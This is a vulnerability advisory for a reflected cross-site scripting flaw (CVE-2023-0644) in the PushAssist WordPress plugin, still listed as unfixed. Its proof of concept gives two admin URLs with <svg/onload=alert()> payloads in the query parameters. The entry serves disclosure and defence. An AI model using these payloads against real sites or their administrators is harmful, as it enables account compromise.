PushAssist <= 3.0.8 – Reflected Cross-Site Scripting | CVE 2023-0644 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape various parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.

Proof of Concept

Make a logged in admin open one of the URL below:

https://example.com/wp-admin/admin.php?page=pushassist-create-account&response_message=<svg/onload=alert(/XSS/)>

https://example.com/wp-admin/admin.php?page=pushassist-send-notifications&response_message=aaa&class="><svg/onload=alert(/XSS/)> (requires the plugin to be connected to a PushAssist account)

Other URLs are affected, the above are just two of them

Affects Plugins

push-notification-for-wp-by-pushassist

No known fix

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Shreya Pohekar

Submitter

Shreya Pohekar

Submitter website

https://shreyapohekar.com

Submitter twitter

Verified

Yes

WPVDB ID

08f5089c-36f3-4d12-bca5-99cd3ae78f67

Timeline

Publicly Published

2023-04-24 (about 1 years ago)

Added

2023-04-18 (about 1 years ago)

Last Updated

2023-04-18 (about 1 years ago)

Other

Published

Title

Published

2023-11-22

Title

GS Team Members < 2.2.4 - Contributor+ Stored XSS

Published

2024-05-07

Title

ADFO – Custom data in admin dashboard < 1.9.1 - Reflected Cross-Site Scripting

Published

2022-07-07

Title

Shortcode For Current Date < 2.1.7 - Contributor+ Stored Cross-Site Scripting

Published

2014-08-01

Title

S3 Video 0.982 - preview_video.php base Parameter XSS

Published

2022-06-21

Title

Best Contact Management Software < 3.8 - Admin+ Stored Cross-Site Scripting